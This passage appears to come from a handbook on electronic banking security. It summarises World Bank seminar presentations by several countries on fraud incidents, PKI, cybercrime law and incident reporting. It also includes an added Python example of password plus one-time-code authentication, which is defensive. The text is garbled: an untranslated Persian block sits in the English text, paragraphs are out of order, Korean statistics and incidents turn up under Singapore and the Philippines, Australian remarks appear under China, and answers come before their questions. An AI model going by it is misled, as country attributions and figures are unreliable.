• Cooperation between government and the private sector. Risks that affect an organization's reputation may lead it to refrain from reporting incidents. Round tables to discuss the legal rules and the existing threats are therefore necessary. One example of operational cooperation and partnership between the private sector and government is InfraGard NIPC, which was the product of cooperation between the private sector of United States industry and the government and was represented by the FBI. Another form of this kind of cooperation, named FIRST [228], has been formed among a number of computer security teams from the government, commercial, and academic sectors. The stated goals of FIRST are to foster coordination and cooperation in preventing risks, rapid response to security incidents, and the promotion of information sharing among users at large. Other examples include the Internet Security Alliance [229] and the Computer Emergency Response Team (CERT), which is the product of a joint collaboration between the international CERT center at Carnegie Mellon University and a number of international non-governmental companies.
• Layered security. The most important approach to information technology security is the layered approach, in which security is not provided by technology alone; people and processes also play a major part. Relying too heavily on valuable technologies such as encryption does not necessarily protect the organization against every possible threat. Twelve security layers have been defined for controlling the integrity of information and reducing risk in open-architecture environments, and in many cases actually implementing a layer does not require a huge investment. These twelve layers are explained in chapter eleven of this part of the book.

224 Video summaries of the discussions at the 2002 and 2003 sessions are available on the World Bank website at the following addresses, respectively:
http://www.worldbank.org/wbi/B-Span/sub_esecurity.htm
http://www1.worldbank.org/finance
225 This session was held with members of the World Bank's Integrator Group present. The members attending were Thomas Glaessner, Tom Kellerman, and Valerie McNevin, together with participants in this global seminar from Brazil, Chile, Mexico, Ukraine, Slovakia, Singapore, South Korea, the Philippines, Hong Kong, Sri Lanka, and the People's Republic of China.
226 E-Risk
227 Withdrawing very small amounts from a large number of different bank accounts on a recurring basis
228 Forum of Incident Response and Security Teams
229 Internet Security Alliance (www.isalliance.org)
The role of countries

Hong Kong
The representatives of the Hong Kong financial supervisory authority began their presentation by reviewing three cases of fraud:
1. An intruder used a Trojan to steal a number of passwords and user IDs and managed to move more than 35,000 US dollars without authorization.
2. One case of fraud occurred in Australia because of a customer's poor awareness of password security in an electronic payment system. Because the necessary restrictions had not been applied, the intruders were able to get into the system and steal about three million dollars.
3. In one Internet fraud, intruders managed to sell about 5 million shares (worth 21.7 million US dollars) and cause sharp swings in the share price.
The lessons that can be drawn from these incidents are:
1. Log changes to third-party accounts. This also means monitoring all unauthorized access and transfers.
2. Monitor electronic banking transactions, and for suspicious transactions and accounts confirm again with the account holders (by SMS or by e-mail).
3. Use multiple factors to authenticate the customer (based on a device that only the customer has, such as a smart card). Note that for this purpose each password can be used only once.
4. Raise the awareness of the customer (the weakest link in the security chain) so that customers can use a variety of methods and channels to transfer information securely. Communications must be secure as well, which includes installing personal firewalls [230] and keeping intrusion detection systems up to date.
5. Incidents must be managed and reported quickly, so that a successful response by the security team is assured.
In Hong Kong the government works with the banks and the police to monitor incidents and risks and, through effective management, ensures accountability, reports incidents, contains losses, and wins public trust. It also points out that, given the wide range of security problems that ISPs face, the variety of existing standards makes it difficult to monitor, to secure, and to inform the public about security considerations.
230 Personal Firewalls

Singapore
Singapore's presentation revolved around four main themes: statistics and notes about Korea, the state of the electronic economy, the national public key infrastructure, and the government's responses to recent incidents. The presentation began with the first theme, offering evidence of the rapid growth of technology between 1998 and 2001:
• In 1998 e-commerce revenues were about 40 million dollars, and in 2001 they reached 91 million dollars.
• In 1998, 14,000 households were connected to high-speed networks, and in 2001 this number reached 7.8 million, equivalent to 64% of the population.
• In 1998 there were only 3 million Internet users, a figure that reached 24 million (half the population of Korea) in 2001.
• At present, mobile devices are used by more than 50% of the population.
The prevalence of electronic banking in Singapore is fully established. Electronic banks are very widespread and popular in this country. Despite the small population of 4 million, approximately 25% of the population uses electronic banking services. The industry is also expanding rapidly. Internet trading began in 1997 and now accounts for about 50% of all trades. By contrast, the insurance industry in this field is not growing as quickly, although its nature dictates as much. Insurance services usually need to be localized, and it is harder to set a single fixed and effective insurance standard for everywhere.
Looking at the criminal side of these developments, statistics show approximately 100 security incidents during 1996 and 1997. In 2000 this figure reached 5,000, and it is currently rising exponentially. Although electronic banking is widespread, two recent security incidents (described below) once again make clear the importance of security policies and procedures in electronic financial services environments:
1. In one incident, the computers of customers of the largest Singaporean bank were infected with various Trojans. Without the users' consent, these Trojans collected their confidential information and sent it to predetermined addresses, which allowed thieves to steal very large sums of money. This particular Trojan was so advanced that it passed safely through anti-virus software and intrusion detection systems. The conclusion to draw is that these tools (anti-virus and intrusion detection) must not be the only defense mechanisms of a business environment.
2. Another incident took place at Singapore's second-largest bank, but it did not attract enough international attention. In this case the banking systems were compromised because security patches had not been applied to them. The details of this attack were not disclosed, for security reasons. Even so, this incident once again demonstrated the need for cooperation among the various law enforcement organizations.
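Lesson 3 from Hong Kong asks for multi-factor authentication in which each password can be used only once, and both the Hong Kong and the Singapore incidents involved Trojans that captured customers' credentials. The sketch below is an added example (not part of the handbook) of a server-side check that combines a password with a counter-based one-time code as specified in RFC 4226; the account record layout, the look-ahead of 3, and the lockout threshold are assumptions, and the secret is the RFC's published test value.

```python
import hashlib
import hmac
import os
import struct

LOOK_AHEAD = 3            # how far the customer's token may run ahead of the server
MAX_FAILURES = 5          # consecutive failures before the account is locked
PBKDF2_ROUNDS = 100_000


def hotp(secret, counter, digits=6):
    """HMAC-based one-time password as specified in RFC 4226."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    value = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(value % 10 ** digits).zfill(digits)


def _hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


def enroll(password, token_secret):
    """Create the server-side record for a customer (constructed layout)."""
    salt = os.urandom(16)
    return {"salt": salt, "pw_hash": _hash_password(password, salt),
            "token_secret": token_secret, "counter": 0, "failures": 0}


def _consume_code(account, code):
    """Accept a code at most once; accepting it also invalidates every earlier code."""
    start = account["counter"]
    for counter in range(start, start + LOOK_AHEAD + 1):
        if hmac.compare_digest(hotp(account["token_secret"], counter), code):
            account["counter"] = counter + 1
            return True
    return False


def authenticate(account, password, code):
    """Both factors must pass: something known (password) and something held (token)."""
    if account["failures"] >= MAX_FAILURES:
        return False                       # locked: needs an out-of-band reset
    pw_ok = hmac.compare_digest(_hash_password(password, account["salt"]),
                                account["pw_hash"])
    if pw_ok and _consume_code(account, code):
        account["failures"] = 0
        return True
    account["failures"] += 1
    return False


def demo():
    secret = b"12345678901234567890"       # RFC 4226 test secret, not a real key
    account = enroll("correct horse", secret)
    captured = ("correct horse", hotp(secret, 0))   # what a credential-stealing Trojan records
    return {
        "customer_login": authenticate(account, *captured),
        "replay_of_captured_pair": authenticate(account, *captured),
        "password_without_token": authenticate(account, "correct horse", "000000"),
        "next_code": authenticate(account, "correct horse", hotp(secret, 1)),
    }


if __name__ == "__main__":
    print(demo())
```

A captured password and code are worthless once the code has been accepted, but a one-time code does not help if malware on the customer's machine alters a transaction inside a live session, which is why lesson 2 (confirming suspicious transactions over a separate channel) still applies.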
‫ﺩﻭﻟﺖ ﺳﻨﮕﺎﭘﻮﺭ ﺑﻄﻮﺭ ﻓﻌﺎﻝ ﺑﻪ ﻣﻮﺿﻮﻉ ﺯﻳﺮﺳﺎﺧﺖ ﻛﻠﻴﺪ ﻋﻤـﻮﻣﻲ‬
‫)‪ (PKI‬ﭘﺮﺩﺍﺧﺘﻪ ﺍﺳﺖ‪" .‬ﻗﺎﻧﻮﻥ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻝ" ﺳﻨﮕﺎﭘﻮﺭ )ﻣﺼﻮﺏ‬
‫ﺳﺎﻝ ‪ (۱۹۹۹‬ﻣﺴﺌﻮﻟﻴﺖ ‪ PKI‬ﺍﻳﻦ ﻛﺸﻮﺭ ﺭﺍ ﺑﻪ ﻭﺯﺍﺭﺗﺨﺎﻧﺔ ﺍﺭﺗﺒﺎﻃﺎﺕ‬
‫ﻭ ﺍﻃﻼﻋﺎﺕ ﺳﭙﺮﺩﻩ ﺍﺳﺖ ﻭ ﺑﺮﻧﺎﻣﺔ ‪ PKI‬ﻣﻠﻲ ﺍﻳﻦ ﻛﺸﻮﺭ‪ ،‬ﻣﺮﺍﻛـﺰ‬
‫ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ‪ ٢٣١‬ﻣﻌﺘﺒﺮ ﺭﺍ ﻣﻌﻴﻦ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺍﻣﺎ ﺍﺯ ﮔﻮﺍﻫﻲ ﻧـﻮﻋﻲ ﺷـﻨﺎﺧﺖ ﺩﻭﺟﺎﻧﺒـﻪ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻭ ﺳـﺎﺯﻣﺎﻥ‬
‫ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻛﺮﻩ )‪ ٢٣٢(KISA‬ﺑﻴﺸﺘﺮ ﺑﺎ ﻣﻮﺿﻮﻋﺎﺕ ﺗﻜﻨﻴﻜـﻲ‬
‫ﻣﺜﻞ ﻧﻈﺎﺭﺕ ﺑﺮ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ‪ ،‬ﺗـﺼﺪﻳﻖ ﺍﻳـﻦ ﻣﺮﺍﻛـﺰ‪ ،‬ﻭ ﺍﻧﺠـﺎﻡ‬
‫ﺗﺤﻘﻴﻘﺎﺕ ﻭ ﺗﻮﺳﻌﻪ ﺩﺭﺑﺎﺭﺓ ‪ PKI‬ﺳﻴﻤﻲ ﻭ ﺑـﻲﺳـﻴﻢ ﺳـﺮ ﻭ ﻛـﺎﺭ‬
‫ﺩﺍﺭﺩ‪ .‬ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺩﺭ ﺍﻳﻦ ﻛﺸﻮﺭ ﺷـﺶ ﻣﺮﻛـﺰ ﻣﻌﺘﺒـﺮ ﺻـﺪﻭﺭ‬
‫ﮔﻮﺍﻫﻲ ﻓﻌﺎﻟﻴﺖ ﻣﻲﻛﻨﻨﺪ‪ .‬ﭼﻮﻥ ﮔﻮﺍﻫﻲﻫـﺎ ﺗﻮﺳـﻂ ﺗﻤـﺎﻡ ﻣﺮﺍﻛـﺰ‬
‫ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻗﺎﺑﻞ ﺷﻨﺎﺳـﺎﻳﻲ ﻫـﺴﺘﻨﺪ‪ ،‬ﻣـﺸﺘﺮﻱ ﻣـﻲﺗﻮﺍﻧـﺪ ﺩﺭ‬
‫ﻣﻌﺎﻣﻼﺕ ﻣﺨﺘﻠﻒ ﻳﻚ ﺍﻣﻀﺎﻱ ﻭﺍﺣﺪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺑﺪﻳﻦ ﺗﺮﺗﻴـﺐ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺍﻣﻀﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗﺤﺖ ﺣﻤﺎﻳﺖ ﻗﺎﻧﻮﻥ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ‪ .‬ﺑﺎ‬
‫ﺍﻳﻨﺤﺎﻝ ﭼﺎﻟﺸﻬﺎﻳﻲ ﻫﻢ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺑﺮﺍﻱ ﻣﺜﺎﻝ‪ ،‬ﺍﺯ ﻣﺮﺍﻛـﺰ ﻣﻌﺘﺒـﺮ‬
‫ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺩﺭ ﺻﻨﻌﺖ ﺑﺎﻧﻜﻲ ﺍﺳﺘﻔﺎﺩﺓ ﮔﺴﺘﺮﺩﻩﺍﻱ ﻣﻲﺷﻮﺩ‪ .‬ﺍﻣﺎ‬
‫ﺍﻳﻦ ﺩﺭ ﻣﻮﺭﺩ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻭﺍﺳﻄﻪﺍﻱ )ﺩﻻﻟﻬﺎ( ﺻﺎﺩﻕ ﻧﻴﺴﺖ‪ :‬ﺍﺯ ‪۳۶‬‬
‫ﻣﺆﺳﺴﺔ ﺍﻳﻨﭽﻨﻴﻨﻲ ﺗﻨﻬﺎ ﭼﻬﺎﺭ ﻣﺆﺳـﺴﻪ ﺍﺯ ﻣﺮﺍﻛـﺰ ﻣﻌﺘﺒـﺮ ﺻـﺪﻭﺭ‬
‫ﮔﻮﺍﻫﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﻛﻨﻨﺪ‪ .‬ﺩﻭ ﺩﻟﻴﻞ ﻣﻲﺗﻮﺍﻥ ﺑﺮﺍﻱ ﺍﻳـﻦ ﺍﻣـﺮ ﺑـﺮ‬
‫ﺷﻤﺮﺩ‪:‬‬
‫‪.۱‬‬
‫ﺗﺠﺎﺭﺕ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﺩﺭ ﺳـﺎﻝ ‪ - ۱۹۹۷‬ﺩﻭ ﺳـﺎﻝ ﭘـﻴﺶ ﺍﺯ‬
‫ﺗﺼﻮﻳﺐ ﻗﺎﻧﻮﻥ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻝ ‪ -‬ﺷﺮﻭﻉ ﺷﺪ‪ .‬ﻟـﺬﺍ ﺍﻳـﻦ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﻗﺒﻞ ﺍﺯ ﺑﻮﺟـﻮﺩ ﺁﻣـﺪﻥ ﻣﺮﺍﻛـﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ‪،‬‬
‫ﻣﺸﻜﻠﻲ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭ ﻧﺪﺍﺷﺘﻨﺪ‪.‬‬
‫‪.۲‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎﻋﺚ ﺗﺄﺧﻴﺮ ﺩﺭ‬
‫ﺍﻧﺠﺎﻡ ﻣﻌﺎﻣﻼﺕ ﺍﻳﻤﻦ ﺷﻮﺩ‪ ،‬ﺍﻣﺎ ﻣﺸﺘﺮﻳﺎﻥ ﻧﻤﻲﺧﻮﺍﻫﻨﺪ ﺩﺭ‬
‫ﺗﺠﺎﺭﺕ ﺩﭼﺎﺭ ﺗﺄﺧﻴﺮ ﻳﺎ ﮔﺮﻓﺘﺎﺭ ﺩﺭﺩﺳﺮﻫﺎﻱ ﺩﻳﮕﺮ ﺷﻮﻧﺪ‪.‬‬
‫ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﻳﻚ ﺣﺎﺩﺛﺔ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻛﺮﻩ ﺑﺤﺚ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﺩﺭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺗﺠـﺎﺭﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﺭﺍ ﺩﮔﺮﮔـﻮﻥ ﺳـﺎﺧﺖ‪ .‬ﺩﺭ ﻣـﺎﻩ‬
‫‪231 Certification Authorities‬‬
‫‪232 Korean Information Security Agency‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
Singapore planned to publish its technology risk management guidelines in the spring of 2003. The country's efforts are guided by good industry practice, with the help of international bodies, and by the outcome of various meetings between banks active in the industry and government officials. One of the main questions from Singapore, which has only a single standard-setting body, was how a government as large as that of the United States, with multiple standard-setting authorities, can apply its rules in a unified way.
Philippines
The Philippines' discussion focused on the consequences of three trends in the growing threat of cybercrime. These three trends were the spread of viruses (such as the I Love You virus), persistent credit card theft, and the events of September 11. The Philippine representatives used September 11 to explain their government's calculations for protecting national economic institutions.
In the Philippines, the spread of the "I Love You" virus quickly forced law enforcement bodies to react. The incident was especially significant because it exposed weaknesses in both government and the private sector. It also brought to light the capacity of law enforcement to understand and respond effectively to technology-related incidents; as a result, a security training program for government staff was put in place, and, to enter this field, the government passed e-commerce laws and a cyber-strategy [234].
233 Licensed Certificate Authorities
Credit card fraud has now become a fundamental problem in the Philippines' electronic financial services sector (as in every other country). The country has 2 to 3 million credit card holders, about 17 banks provide credit services for these cards, and several million electronic commercial transactions take place each year. It is estimated that about 400 million pesos (equivalent to 8 million US dollars) of financial abuse can be attributed to credit card fraud. ATMs are also widely used and have about 10 million customers nationwide.
The third topic of discussion was that September 11 forced banks to work toward greater cooperation with other countries in order to improve electronic security.
As elsewhere in the world, the Philippines' electronic economy is still in the early stages of development. In this regard, the Philippines has also addressed parts of the eight proposed pillars of electronic security for risk mitigation: linking the legal framework with enforcement methods, establishing cooperation between government and private companies, and improving the capabilities of law enforcement in the area of cybercrime. Even so, the Philippines still needs skilled legal experts, particularly for specialized courts. Among the country's other needs are databases and training for everyone involved in financial services, including customers, vendors, and service providers.
The Filipinos raised two main questions: 1) How has the United States struck a balance between incident reporting and preserving confidentiality? and 2) What is the place of Interpol in criminal law?
234 Cyber-Strategy
August of last year, several brokerage firms found inactive, dormant accounts which, as just one part of their activity, had bought about 20 million US dollars of shares from investors. In response, security concerns grew and the use of accredited certification authorities became more widely mandated. On 1 December 2002, private certificates were declared "invalid", and from then on only certificates issued by licensed certificate authorities (LCAs) [233] were considered valid; by May 2003, all certificates also had to be re-validated. It became mandatory for all brokerage firms from November 2002, and for smaller institutions from January 2003 onward, to use certificates from licensed certificate authorities in Internet trading.
Sri Lanka
The Sri Lankan representatives began by giving background on the electronic economy and discussing the constraints on raising security awareness among Internet users. They believed that connectivity issues will soon be resolved, and that the lack of awareness lies mostly at management level, which is why winning support in areas such as expanding connectivity is very difficult. Another weakness, found among customers, is a lack of awareness of how to carry out a secure Internet transaction. As a result, trust among customers has declined and they are less willing to take part in Internet transactions. Creating guidelines and codes of practice and providing them to service providers can also help build customer trust.
Sri Lanka's question concerned Internet service providers. They wanted to know whether there will be official guidelines and codes of practice for ISPs in the area of electronic security. They also asked for information about the Korean security agency: whether it is private or governmental, and which roles it covers.
Bulgaria
Bulgaria's modern banking services were launched in 1989 with a culture similar to that of the United States and Europe. These services included payment systems and software packages specific to the banking industry (BANKNET, for example). Bulgaria began its security measures with basic questions about "what must be protected", and then identified the critical elements of this work, such as physical networks, internal information systems, and data protection applications (especially for data exchanged between banks and customers).
Organizationally, Bulgaria had an internal committee responsible for analysis and for proposing solutions. Developing electronic security policies requires monitoring communication networks and how they are used, which involves up-to-date software and hardware and a list of specific and complex activities. The Bulgarians regard the security of payment systems as critical. The country's supervisory and preventive changes also include training, an important component of Bulgaria's security plan. They also noted that they must continue to work on the legal and enforcement foundations of this matter (including technical agreements between subscribers of different networks).
Bulgaria has a legal framework for electronic signatures that comprises the Electronic Document Act, regulation of the legal activities of certification authorities, and advanced electronic signature requirements. Banks currently wish to build a PKI. They want to take on the role of certification authority for specific applications of this system. There is therefore a need for internal flexibility and for the use of interoperable interbank technologies. Bulgaria also has one particular consideration regarding security policies: in addition to defining business requirements, it must define reliability. Implementing the concept of the electronic signature and putting it to general use is difficult in many activities. The key factors in Bulgaria's payment systems are vendor, reliability, and price. Banking services sit in a protected zone, where the protection consists of a dedicated gateway for each application plus a firewall. Through the BANKNET software package, banks can be reached via the Internet. Many attacks on websites and e-mail servers take place because these can be reached from the Internet. Behind a firewall, however, an adequate level of security is provided for banking services and interbank applications.
In Bulgaria as elsewhere, central banks adopt legal frameworks for electronic payment systems. These frameworks usually cover new payment methods and the rules governing national payment systems. In this way a new legal basis is created for national payment systems, including central payment systems and card systems. Bulgaria concluded that the currency has become problematic because of the difficult condition of bank balances. They have questions about the role of supervision in the electronic security of payment systems and want to know whether stricter supervision should be applied to these systems. Brazil and South Africa, for example, take strict approaches to supervising payment systems and believe that they have designed an efficient and competitive system. In some circumstances, rules can become a monopolizing factor for retail systems and prevent them from operating, so regulatory documents must also include careful assessments of how technologies affect retail systems.
Conclusion
Global Seminar 2003: Electronic Safety and Soundness [235]
In view of the steady growth of risks, this meeting underlined the importance of attending to electronic security issues on a global scale. When reporting procedures are disorderly, every security incident can become more dangerous. Most information about electronic security is imprecise. In addition, worms, viruses, and other kinds of electronic threat have had serious consequences for the world's critical infrastructure.
235 This session was held with members of the World Bank Integrator Group in attendance. The members present were Thomas Glaessner, Tom Kellerman, and Valerie McNevin, together with participants in this global seminar from Brazil, Chile, Colombia, Mexico, Saudi Arabia, Ukraine, Australia, China (Beijing), China (Hong Kong), Malaysia, the Philippines, Singapore, and Sri Lanka. The original documents of these meetings are available at:
http://wbln0018.worldbank.org/html/FinancialSectorWeb.nsf/SearchGeneral?openform&ESecurity/E-Finance&Presentations
Mitigating electronic security risks: a combination of soft and hard infrastructure
One possible definition of electronic security is "any tool, technique, and process that protects a system's information assets against threats to their confidentiality, integrity, or availability". Electronic security is made up of two infrastructures: the soft infrastructure, comprising policies, procedures, processes, and protocols; and the hard infrastructure, comprising hardware and software. Growing dependence on technology increases the likelihood of threats and, at times, widens their impact and the damage they cause. Meanwhile, as we saw earlier, organized and sometimes terrorist activity is increasing the speed and severity of attacks. All of these factors combine to make risk mitigation one of the most important parts of an ideal and effective security plan.
Developing electronic security programs faces great challenges for several reasons:
First, security efforts are usually expected to be reactive rather than proactive. This view must change so that current and future threats can be countered actively and continuously.
Second, international cooperation is especially important, particularly for law enforcement agencies and supervisors; yet we know that even within a single country, cooperation among domestic agencies can be complicated.
All participating countries stressed the need for broad, cross-sector training in electronic security, and in the end the World Bank Integrator Group took on responsibility for providing best-practice reports and holding seminars on electronic risk mitigation.
Electronic security problems typically include a shortage of trained security teams, a lack of effective government processes for verifying integrity, and emerging technologies such as mobile communications. The pillars of information technology are growing rapidly, and because cyber threats and vulnerabilities are spreading just as fast, billions of dollars of capital are at risk. The aim of international dialogue is not to dwell on why security breaches happen, but on what can be done to solve the problems.
Third, the failure to report incidents is a serious obstacle to understanding the scope of existing threats, because there is still considerable reluctance to report security breaches publicly.
Fourth, in addition to institutions' reluctance to report incidents, the time taken to respond to incidents is also long in many cases.
Finally, staff continue to play a pivotal role, and a single inexperienced user can compromise the security of an entire network; it is therefore essential to raise everyone's awareness of threats. If electronic threats are not managed properly, public trust in technology will inevitably be damaged. With these points in mind, several further steps must be taken to reach higher levels of electronic security:
First, regulators, financial institutions, and other market participants must work to identify and promote best practices in electronic security.
Second, cooperation must become routine and permanent, with particular attention to removing the key threats facing organizations and customers at large.
Third, providing training to staff and to security auditors must be a high priority for business and government. The definition and practical scope of risk must include the various cyber risks as well as the traditional forms of information and physical threat.
Supervision of information security and technology risk
As the information technology sector grows beyond the limits of local capabilities and talent, turning to external resources for security has become common practice, and the use of international resources for this purpose in particular has created both threats and opportunities for organizations around the world. The efforts made in recent years to reduce electronic threats can be seen as a blessing in disguise for banks: they oblige banks to draw up a response program to protect customer data against threats, and they provide all the guidance needed along the way. Such a program must also provide for processes by which customers are informed of incidents of unauthorized disclosure of information.
Despite sophisticated and innovative policies and procedures, security has still not become a simple matter, so constant vigilance and training remain essential. Some newer areas of security that currently call for more attention are vulnerability assessment, penetration testing, intrusion detection systems, and cybercrime law.
Mobile technologies: new achievements and new risks
In 2002, GSM had about 787 million users worldwide. Wireless technology is growing at three times the rate of landlines. Like other communication technologies, it is vulnerable to malicious code such as Trojans and viruses and to denial-of-service attacks. In the hostile environment of the Internet, wireless technology is the Achilles' heel of security. The wireless connection is usually the weakest link in the security chain. GSM vulnerabilities include SIM card vulnerability, SMS bombing, WAP vulnerabilities, and the attack known as "man in the middle" [236].
Although GSM technology cannot be made completely secure, users can protect themselves far better with a few simple steps:
• enabling the power-on password;
• installing antivirus software;
• installing a personal firewall with encryption capability;
• making sure devices are stored securely, and protecting applications with passwords;
• installing VPN software. For smart cards, likewise, third parties should not manage PINs.
236 In this type of attack, a modified mobile phone presents itself to other mobile phones as a fake base station, which allows the attacker to steal information. Data at gateways is entirely in the clear, without any encryption, and this exposes users and their data to major vulnerabilities.
Presentations by country representatives
During this global meeting, the representatives of all countries were asked to answer the following three questions:
2. Which processes do economic institutions in your country currently follow to mitigate electronic security risks, and what changes do they envisage in their supervisory process?
3. How can multilateral and multinational institutions, working with other supervisory agencies, help you?
In answer to this question, a representative of Singapore proposed severe administrative penalties and updating regulations at regular intervals, in the belief that laws such as the "Computer Misuse Act" have proved their worth in identifying computer crime and in making it less attractive to amateur intruders.
An FBI representative also stated that this is an international social phenomenon that does not depend on borders. In some cases the offender does not recognize the seriousness of the crime being committed. Indeed, some people do not regard computer crime as real crime. Moreover, in order to attract more customers, banks behave as though they have made the myth of security everlasting. The public therefore needs to be given a better understanding of the risks of financial services and electronic commerce, because in this area withholding information only makes the problems more acute. In particular, there are formidable problems connected with the cross-sector nature of electronic crime, including cyber intrusions and tampering with bank sites. International cooperation in this area is therefore necessary.
Brazil
The Brazilian representative noted that competition drives companies to build advanced technologies, but that these technologies are prone to vulnerabilities. There is a trade-off between the cost of services on the one hand and fraud on the other. The effectiveness of examination techniques for training courses is increasing in Brazil.
In answer to the question of how multinational institutions can help countries, the Brazilians wished to be helped in the following areas: holding examinations for training courses, developing security guidelines and standards, and creating security models with a minimum of banking rules.
Question
The Brazilians asked how, given the dynamic nature and rapid advance of technology, which make legislating difficult, a legal infrastructure for dealing with crime can be created.
Mexico
In response to the question on trends in electronic security incidents, Mexico noted that the ability to access PINs via the web is increasing, which makes the risks more serious. In any case, they are making considerable efforts to reduce electronic risks; financial institutions have strong control capabilities, and there are many security and audit firms with expertise in information technology. Mexico has also taken the BASEL recommendations on controlling technology risk into account.
In answer to the third question, the Mexicans proposed that, in order to share experiences, assessments, and needs, global information should be exchanged among the various organizations.
1. What trends do you see in electronic security incidents? What are the greatest challenges or vulnerabilities? (identity theft, denial of service, Internet money laundering, or other forms of electronic fraud)
Answer
Question
Mexico asked about the depth of Singapore's guidelines.
Answer
Singapore's general security practices are available online. [237] These guidelines comprise 26 practices in areas such as operating systems, patches, roles and responsibilities, antivirus software, firewalls, and so on.
Colombia
The Colombian representative said that their security problems are like those of other countries and that they too see themselves as vulnerable. The country currently has no standard for incident response, and no computer security emergency response center has been set up there. Colombian clients are liable to fall victim to attacks; identity theft is rising; bank cards are forged; there is no law guaranteeing confidentiality; risk mitigation is left to auditors alone; PKI and smart cards are in use, but banks' electronic security is rudimentary; employees usually disregard security instructions, and security does not have its proper place in Colombian banking culture; and on top of all this, keeping up to date is also a fundamental problem in the country.
Clearly, multilateral institutions have a fundamental role in this area. For example, UNCITRAL has a model law for computer crime in areas such as harassment, denial of service, and transactions. A characteristic of model laws is that, unlike ordinary laws, they must be based on civil law.
Question
The Colombian representative asked how the integrity of security in financial institutions comes into question, especially in the light of profit-and-loss considerations. Issues such as liability and risk management are fundamental concerns, particularly when customers are taken into account.
237 http://wbln0018.worldbank.org/html/FinancialSectorWeb.nsf/(attachmentweb)/Singpore_TRMguidelines28Feb03/$FILE/Singpore_TRMguidelines28Feb0
Answer
Because of jurisdictional considerations, cooperation among different agencies is necessary even to determine where a crime took place. To begin with, a common language for describing problems, ways of mitigating them, and cross-sector standards must be developed. Defining "fraud" in the European Union, for example, ran into difficulties. One example of a cross-sector body active in this field is the Financial Action Task Force (FATF) [238], which combats money laundering and terrorism.
Ukraine
After Ukraine's independence, changes took place in the country's banking system that led to the use of electronic technologies in it. Security technologies such as electronic signatures and cryptography are administered by the National Bank. [239] Since the country's independence, laws on electronic signatures and electronic transactions have come into force. Despite some attempts to break into the banking system, no notable loss has been reported so far.
On the legal side, Ukraine signed the cybercrime convention in 2001 and has since prosecuted computer misuse. In addition, the country's parliament has passed a law on the protection of personal information. The criminal code also addresses cybercrime, yet these laws have little effect, because applying them first requires proof of "willfulness" and "intent" in committing the offense. As a result, inadequate prosecution of crimes has become routine, since producing court-admissible evidence that such crimes were deliberate is genuinely difficult. Security staff in law enforcement need adequate training in collecting evidence of crime.
Question
Ukraine's main question was about ensuring responsibility and accountability through internal oversight and reporting mechanisms. For example, incident reporting by bank officers is essential to a bank's security. To support incident response capabilities, a computer security emergency response center has been established in Ukraine.
238 Financial Action Task Force
239 In this country, all banks are considered part of the National Bank system.
Answer
APEC will also address wireless technology and will briefly cover the risks of technologies such as Wi-Fi.
Third, by the end of October 2003, computer security emergency response centers will be set up in all APEC member countries.
China, Beijing
Australia has chosen and implemented BASEL2 for classifying information. Nevertheless, they have found that making ever greater use of intrusion detection systems is not easy, given so many false positives and untuned systems. New technologies are built on top of earlier ones, and this adds to the complexity and interdependence of systems. At the same time, the way systems work may not be well documented. Learning how systems depend on one another is critical, but the documentation available is usually very limited. The Australian representative pointed out that free training material, both general and specialized, is available for download in that country.
Despite the unfavorable security situation, Internet banks in China are growing fast. Their number rose from one to twenty-seven between 1999 and 2003, and the volume of banking activity grew more than 100-fold. It was noted that Internet banking flourished during the SARS outbreak. Finally, China put forward the following proposals:
Australia
Australia raised three key points.
First, by October 2003 all APEC member countries will have cybercrime laws in place, covering matters such as electronic fraud and the cross-sector and international enforcement of electronic laws.
Second, training and cooperation in law enforcement are needed at all levels, and information technology standards will be included in these courses in summary form. The cyber security program of
1. Encouraging information sharing at the national and international levels
2. Creating international electronic security standards
3. Increasing transparency in electronic banking
China, Hong Kong
In Hong Kong, fake e-mails, viruses, and worms are very common. Alongside these problems, the behavior of attackers has also changed. Instead of banks being targeted directly, the weakest link, namely the customer, has come under attack, so customer education is vital.
A recent incident involving a website belonging to a fake bank made the security problems more apparent. The bank had posted an incomplete postal address on its website and made no use of a
